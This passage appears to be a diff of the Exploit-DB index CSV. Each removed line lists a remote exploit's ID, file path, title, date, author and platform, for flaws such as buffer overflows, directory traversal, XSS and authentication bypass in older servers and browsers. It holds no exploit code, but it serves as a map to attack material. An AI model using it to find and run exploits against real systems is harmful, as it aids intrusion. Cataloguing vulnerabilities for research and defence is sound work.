-22737,exploits/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,windows,remote, -22738,exploits/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,windows,remote, -22751,exploits/multiple/remote/22751.txt,"Mozilla 1.x / opera 6/7 - Timed document.write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote, -22753,exploits/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote, -22754,exploits/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (2)",2003-06-10,inv,cgi,remote, -22755,exploits/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure",2003-06-10,"Ziv Kamir",multiple,remote, -22758,exploits/windows/remote/22758.txt,"silentthought simple Web server 1.0 - Directory Traversal",2003-06-12,"Ziv Kamir",windows,remote, -22769,exploits/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote, -22771,exploits/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote, -22782,exploits/windows/remote/22782.py,"Microsoft Windows Server 2000 - Active Directory Remote Stack Overflow",2003-07-02,"Core Security",windows,remote, -22783,exploits/windows/remote/22783.txt,"Microsoft Internet Explorer 5/6 - MSXML XML File Parsing Cross-Site Scripting",2003-06-17,"GreyMagic Software",windows,remote, -22784,exploits/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote, -22785,exploits/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote, -22786,exploits/linux/remote/22786.c,"Dune 0.6.7 - GET Remote Buffer Overrun",2003-06-17,V9,linux,remote, -22787,exploits/windows/remote/22787.rb,"Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,windows,remote, -22795,exploits/windows/remote/22795.txt,"MiniHTTPServer Web Forums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote, -22807,exploits/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",windows,remote, -22824,exploits/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote, -22827,exploits/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote, -22830,exploits/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote, -22832,exploits/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote, -22833,exploits/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote, -22834,exploits/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote, -22837,exploits/windows/remote/22837.c,"Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote, -22838,exploits/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote, -22848,exploits/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote, -22854,exploits/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote, -22856,exploits/linux/remote/22856.rb,"Narcissus Image Configuration - Passthru (Metasploit)",2012-11-21,Metasploit,linux,remote, -22858,exploits/openbsd/remote/22858.txt,"OpenBSD 3.x - PF RDR Network Information Leakage",2003-07-02,Ed3f,openbsd,remote, -22867,exploits/multiple/remote/22867.pl,"Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure",2003-07-05,rs2112,multiple,remote, -22869,exploits/windows/remote/22869.html,"Microsoft Outlook 5.5/2000 - Web Access HTML Attachment Script Execution",2003-07-05,"Hugo Vazquez",windows,remote, -22871,exploits/windows/remote/22871.c,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (1)",2003-07-07,vkhoshain,windows,remote, -22872,exploits/windows/remote/22872.txt,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (2)",2003-07-07,"Peter Winter-Smith",windows,remote, -22873,exploits/linux/remote/22873.c,"GKrellM Mailwatch Plugin 2.4.1/2.4.2 - From Header Remote Buffer Overflow",2003-07-06,isox,linux,remote, -23034,exploits/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration",2003-08-14,"Andy Davis",windows,remote, -22890,exploits/freebsd/remote/22890.pl,"cftp 0.12 - Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote, -22891,exploits/freebsd/remote/22891.pl,"IglooFTP 0.6.1 - Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote, -22892,exploits/windows/remote/22892.txt,"Mabry Software HTTPServer/X 1.0 0.047 - File Disclosure",2003-07-11,dr_insane,windows,remote, -22893,exploits/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - FTP Gateway Buffer Overflow",2003-07-11,V9,linux,remote, -22894,exploits/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - GSisText Buffer Overflow",2003-07-11,V9,linux,remote, -22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,hardware,remote, -22903,exploits/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)",2012-11-22,Metasploit,windows,remote, -22905,exploits/windows/remote/22905.rb,"Apple QuickTime 7.7.2 - TeXML Style Element font-table Field Stack Buffer Overflow (Metasploit)",2012-11-24,Metasploit,windows,remote, -22908,exploits/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 - Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote, -22909,exploits/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,windows,remote, -22944,exploits/windows/remote/22944.txt,"Savant Web Server 3.1 - CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,windows,remote, -22951,exploits/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote, -22959,exploits/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 - Script Execution",2003-07-25,http-equiv,windows,remote, -22964,exploits/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String",2003-07-28,lucipher,unix,remote, -22966,exploits/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (1)",2003-07-29,D4rkGr3y,windows,remote, -22967,exploits/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (2)",2003-07-29,anonymous,windows,remote, -22968,exploits/linux/remote/22968.c,"Valve Software Half-Life Server 1.1.1.0/3.1.1.1c1/4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote, -22917,exploits/windows/remote/22917.txt,"Microsoft Windows - DCOM RPC Interface Buffer Overrun",2003-08-11,aT4r@3wdesign.es,windows,remote, -22919,exploits/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting",2003-07-16,"Brett Moore",windows,remote, -23006,exploits/php/remote/23006.rb,"Network Shutdown Module 3.21 - 'sort_values' Remote PHP Code Injection (Metasploit)",2012-11-29,Metasploit,php,remote, -22969,exploits/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote, -22973,exploits/windows/remote/22973.rb,"Apple QuickTime 7.7.2 - MIME Type Buffer Overflow (Metasploit)",2012-11-28,Metasploit,windows,remote, -22974,exploits/unix/remote/22974.c,"WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote, -22975,exploits/unix/remote/22975.c,"WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote, -22976,exploits/freebsd/remote/22976.pl,"FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote, -22994,exploits/multiple/remote/22994.txt,"Sun One 5.1 / IPlanet 5.0/5.1 - Administration Server Directory Traversal",2003-08-08,"Jim Hardisty",multiple,remote, -23002,exploits/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 - Null Password Authentication",2003-08-09,"Buckaroo Banzai",windows,remote, -23019,exploits/windows/remote/23019.c,"Microsoft Windows Server 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking",2003-08-11,root@networkpenetration.com,windows,remote, -23024,exploits/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Full Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote, -23038,exploits/windows/remote/23038.c,"eMule 0.2x Client - OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",windows,remote, -23040,exploits/windows/remote/23040.c,"eMule 0.2x - AttachToAlreadyKnown Double-Free",2003-09-01,"Stefan Esser",windows,remote, -23043,exploits/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - '.SMIL' File Script Execution",2003-08-19,KrazySnake,windows,remote, -23044,exploits/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",windows,remote, -23049,exploits/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote, -23054,exploits/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Code Execution",2003-08-23,kf,linux,remote, -23066,exploits/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - 'Filename' Buffer Overrun",2003-08-27,storm,windows,remote, -23068,exploits/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal",2003-08-30,sickle,windows,remote, -23069,exploits/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote, -23070,exploits/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal",2003-08-30,"Martin Eiszner",multiple,remote, -23071,exploits/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote, -23073,exploits/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution",2012-12-02,kingcope,windows,remote, -23074,exploits/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level",2012-12-02,kingcope,windows,remote, -23079,exploits/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote, -23080,exploits/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote, -23081,exploits/multiple/remote/23081.pl,"MySQL - Unauthenticated Remote User Enumeration",2012-12-02,kingcope,multiple,remote, -23082,exploits/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass",2012-12-02,kingcope,linux,remote, -23083,exploits/windows/remote/23083.txt,"MySQL - 'Stuxnet Technique' Windows Remote System",2012-12-02,kingcope,windows,remote, -23091,exploits/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Full Path Disclosure",2003-09-02,"Ziv Kamir",windows,remote, -23092,exploits/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 - Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote, -23093,exploits/windows/remote/23093.txt,"Microsoft Windows XP - TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",windows,remote, -23094,exploits/windows/remote/23094.txt,"Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 - Document Handling Buffer Overrun",2003-09-03,"eEye Digital Security Team",windows,remote, -23095,exploits/windows/remote/23095.c,"Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow",2003-09-03,"Oliver Lavery",windows,remote, -23100,exploits/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun",2003-09-04,xfocus,windows,remote, -23113,exploits/windows/remote/23113.c,"Microsoft Exchange Server 4.0/5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,remote, -23114,exploits/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation",2003-09-07,http-equiv,windows,remote, -23115,exploits/linux/remote/23115.c,"Mah-Jong 1.4 - Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,linux,remote, -23121,exploits/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote, -23122,exploits/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)",2003-09-08,http-equiv,windows,remote, -23123,exploits/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote, -23131,exploits/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution",2003-09-10,"Liu Die Yu & Jelmer",windows,remote, -23224,exploits/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution (Metasploit)",2012-12-09,Metasploit,multiple,remote, -23135,exploits/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 - WebAdmin Interface Information Disclosure",2003-09-10,"Phuong Nguyen",windows,remote, -23136,exploits/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote, -23137,exploits/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote, -23144,exploits/windows/remote/23144.txt,"minihttp file-sharing for net 1.5 - Directory Traversal",2003-09-15,Winter-Smith,windows,remote, -23147,exploits/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 - Path Disclosure",2003-09-15,@stake,windows,remote, -23148,exploits/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 - Connection redirection",2003-09-15,@stake,windows,remote, -23149,exploits/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 - Cross-Site Scripting",2003-09-15,"Ollie Whitehouse",windows,remote, -23151,exploits/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 - HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",linux,remote, -23152,exploits/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,windows,remote, -23155,exploits/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)",2012-12-05,Metasploit,windows,remote, -23156,exploits/unix/remote/23156.rb,"(SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit)",2012-12-05,Metasploit,unix,remote, -23157,exploits/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c - Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote, -23161,exploits/linux/remote/23161.c,"LSH 1.x - Remote Buffer Overflow (1)",2003-09-19,"Carl Livitt",linux,remote, -23162,exploits/linux/remote/23162.c,"LSH 1.x - Remote Buffer Overflow (2)",2003-09-19,"m00 security",linux,remote, -23171,exploits/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption",2003-09-23,V9,linux,remote, -23173,exploits/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure",2003-09-24,"Phuong Nguyen",multiple,remote, -23174,exploits/multiple/remote/23174.txt,"TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2003-09-24,"Phuong Nguyen",multiple,remote, -23176,exploits/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",multiple,remote, -23178,exploits/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution (Metasploit)",2012-12-06,Metasploit,multiple,remote, -23179,exploits/windows/remote/23179.rb,"Oracle MySQL (Windows) - MOF Execution (Metasploit)",2012-12-06,Metasploit,windows,remote, -23182,exploits/linux/remote/23182.c,"GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1)",2003-09-25,jsk,linux,remote, -23183,exploits/linux/remote/23183.c,"GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2)",2003-11-04,snooq,linux,remote, -23185,exploits/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",windows,remote, -23186,exploits/linux/remote/23186.txt,"MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote, -23187,exploits/cgi/remote/23187.txt,"SBox 1.0.4 - Full Path Disclosure",2003-09-25,"Julio e2fsck Cesar",cgi,remote, -23188,exploits/linux/remote/23188.c,"Athttpd 0.4b - GET Remote Buffer Overrun",2003-09-25,r-code,linux,remote, -23196,exploits/linux/remote/23196.c,"WebFS 1.x - 'Pathname' Buffer Overrun",2003-09-29,jsk,linux,remote, -23198,exploits/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote, -23199,exploits/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing",2003-10-09,Syzop,multiple,remote, -23203,exploits/windows/remote/23203.rb,"IBM System Director Agent - DLL Injection (Metasploit)",2012-12-07,Metasploit,windows,remote, -23209,exploits/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal",2003-10-01,"GamaSec Security",windows,remote, -23211,exploits/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",windows,remote, -23212,exploits/hardware/remote/23212.txt,"Cisco LEAP - Password Disclosure",2003-10-03,"Cisco Security",hardware,remote, -23221,exploits/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 - HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",multiple,remote, -23222,exploits/windows/remote/23222.txt,"Easy File Sharing Web Server 1.2 - Information Disclosure",2003-10-06,nimber@designer.ru,windows,remote, -23225,exploits/windows/remote/23225.rb,"Maxthon3 - about:history XCS Trusted Zone Code Execution (Metasploit)",2012-12-09,Metasploit,windows,remote, -23226,exploits/windows/remote/23226.rb,"Freefloat FTP Server - Arbitrary File Upload (Metasploit)",2012-12-09,Metasploit,windows,remote,21 -23227,exploits/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component - Command Injection (Metasploit)",2012-12-09,Metasploit,unix,remote, -23229,exploits/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote, -23230,exploits/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - 'postURL'/'getURL' Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote, -23243,exploits/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Remote Buffer Overflow",2012-12-09,D35m0nd142,windows,remote, -23247,exploits/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote, -23404,exploits/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote, -23257,exploits/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote, -23265,exploits/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote, -23270,exploits/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote, -23271,exploits/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote, -23272,exploits/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 - Error Message Information Disclosure",2003-10-22,"Jon Hart",solaris,remote, -23387,exploits/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal",2003-11-17,nimber@designer.ru,windows,remote, -23282,exploits/multiple/remote/23282.txt,"Apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",multiple,remote, -23283,exploits/windows/remote/23283.txt,"Microsoft Internet Explorer 6 - Local Resource Reference",2003-10-24,Mindwarper,windows,remote, -23290,exploits/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow (Metasploit)",2012-12-11,Metasploit,windows,remote, -23291,exploits/multiple/remote/23291.txt,"Opera Web Browser 7 - IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote, -23295,exploits/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",linux,remote, -23296,exploits/linux/remote/23296.txt,"RedHat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote, -23298,exploits/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,windows,remote, -23304,exploits/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote, -23306,exploits/linux/remote/23306.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow",2003-10-27,d3ck4,linux,remote, -23307,exploits/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote, -23309,exploits/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote, -23312,exploits/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote, -23316,exploits/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting",2003-10-31,"Andy Davis",windows,remote, -23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,hardware,remote, -23318,exploits/windows/remote/23318.txt,"Ashley Brown iWeb Server - Encoded Backslash Directory Traversal",2003-10-31,cr-secure.net,windows,remote, -23320,exploits/multiple/remote/23320.txt,"MLdonkey 2.5-4 - Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote, -23321,exploits/windows/remote/23321.txt,"Microsoft Internet Explorer 6 < 10 - Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote, -23323,exploits/windows/remote/23323.py,"Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote, -23328,exploits/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (1)",2003-11-03,airsupply,windows,remote, -23329,exploits/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (2)",2003-11-03,exworm,windows,remote, -23334,exploits/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - GET Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote, -23340,exploits/windows/remote/23340.txt,"Microsoft Internet Explorer 6 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote, -23385,exploits/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote, -23365,exploits/windows/remote/23365.txt,"TelCondex SimpleWebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote, -23366,exploits/linux/remote/23366.c,"Epic 1.0.1/1.0.x - CTCP Nickname Server Message Buffer Overrun",2003-11-10,Li0n7,linux,remote, -23368,exploits/linux/remote/23368.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)",2003-11-10,demz,linux,remote, -23369,exploits/linux/remote/23369.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (2)",2003-11-10,Li0n7,linux,remote, -23371,exploits/linux/remote/23371.c,"Hylafax 4.1.x - HFaxD Format String",2003-11-10,"Sebastian Krahmer",linux,remote, -23373,exploits/windows/remote/23373.html,"Opera Web Browser 7.x - URI Handler Directory Traversal",2003-11-12,S.G.Masood,windows,remote, -23376,exploits/hardware/remote/23376.txt,"Fortigate Firewall 2.x - dlg Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote, -23377,exploits/hardware/remote/23377.txt,"Fortigate Firewall 2.x - Policy Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote, -23378,exploits/hardware/remote/23378.txt,"Fortigate Firewall 2.x - listdel Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote, -23379,exploits/hardware/remote/23379.txt,"Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote, -23380,exploits/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",multiple,remote, -23396,exploits/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",multiple,remote, -23397,exploits/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun",2003-11-24,Shadowinteger,linux,remote, -23398,exploits/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",windows,remote, -23399,exploits/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote, -23400,exploits/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote, -23401,exploits/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",windows,remote, -23405,exploits/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote, -23411,exploits/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote, -23413,exploits/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Remote Buffer Overflow",2003-12-05,c0wboy,linux,remote, -23417,exploits/windows/remote/23417.pl,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote, -23419,exploits/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass",2003-12-08,"Luigi Auriemma",windows,remote, -23422,exploits/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote, -23423,exploits/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote, -23449,exploits/unix/remote/23449.txt,"Xerox MicroServer - Web Server Directory Traversal",2003-12-19,"J.A. Gutierrez",unix,remote, -23450,exploits/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - WebServer Directory Traversal",2003-12-19,"Luigi Auriemma",windows,remote, -23451,exploits/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - WebServer Cross-Site Scripting",2003-12-19,"Luigi Auriemma",windows,remote, -23433,exploits/multiple/remote/23433.txt,"Mozilla Browser 1.5 - URI MouseOver Obfuscation",2003-12-11,netmask,multiple,remote, -23435,exploits/windows/remote/23435.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)",2003-12-16,Adik,windows,remote, -23436,exploits/windows/remote/23436.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)",2003-12-16,kralor,windows,remote, -23437,exploits/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)",2003-12-16,kralor,windows,remote, -23439,exploits/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - 